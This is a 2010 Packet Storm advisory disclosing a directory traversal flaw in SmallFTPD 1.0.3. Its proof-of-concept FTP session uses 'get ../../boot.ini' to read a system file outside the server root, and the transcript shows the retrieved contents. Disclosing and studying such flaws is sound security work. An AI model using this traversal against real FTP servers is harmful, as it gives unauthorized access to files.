SmallFTPD 1.0.3 Directory Traversal

2010-11-01T00:00:00
ID PACKETSTORM:95340
Type packetstorm
Reporter Pr0T3cT10n
Modified 2010-11-01T00:00:00

Description

                                        
                                            `# _ ____ __ __ ___  
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |  
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /  
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /  
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/   
# Live by the byte |_/_/   
#  
# Members:  
#  
# Pr0T3cT10n  
# -=M.o.B.=-  
# TheLeader  
# Sro  
#  
# Contact: inv0ked.israel@gmail.com  
#  
# -----------------------------------  
# SmallFTPD is vulnerable for a path traversal, the following will explain you how to read files  
# The vulnerability allows an unprivileged attacker to read files whom he has no permissions to.  
# The vulnerable FTP command are:  
# * GET - Read File  
#-----------------------------------  
# Vulnerability Title: SmallFTPD v1.0.3 Remote Directory Traversal Vulnerability  
# Date: 31/10/2010  
# Author: Pr0T3cT10n  
# Software Link: http://sourceforge.net/projects/smallftpd/files/smallftpd/smallftpd-1.0.3-fix/smallftpd-1.0.3-fix.zip/download  
# Affected Version: 1.0.3  
# Tested on Windows XP Hebrew, Service Pack 3  
# ISRAEL, NULLBYTE.ORG.IL  
###  
Microsoft Windows XP [Version 5.1.2600]  
(C) Copyright 1985-2001 Microsoft Corp.  
  
C:\Documents and Settings\Admin>ftp 127.0.0.1  
Connected to 127.0.0.1.  
220- smallftpd 1.0.3  
220- check http://smallftpd.free.fr for more information  
220 report bugs to smallftpd@free.fr  
User (127.0.0.1:(none)): test  
331 User name okay, password required.  
Password:  
230 User logged in.  
ftp> get ../../boot.ini  
200 Port command successful.  
150 Data connection ready.  
226 Transfer complete.  
ftp: 211 bytes received in 0.00Seconds 211000.00Kbytes/sec.  
ftp> bye  
221 Good bye.  
  
C:\Documents and Settings\Admin>type boot.ini  
[boot loader]  
timeout=30  
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS  
[operating systems]  
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"  
  
`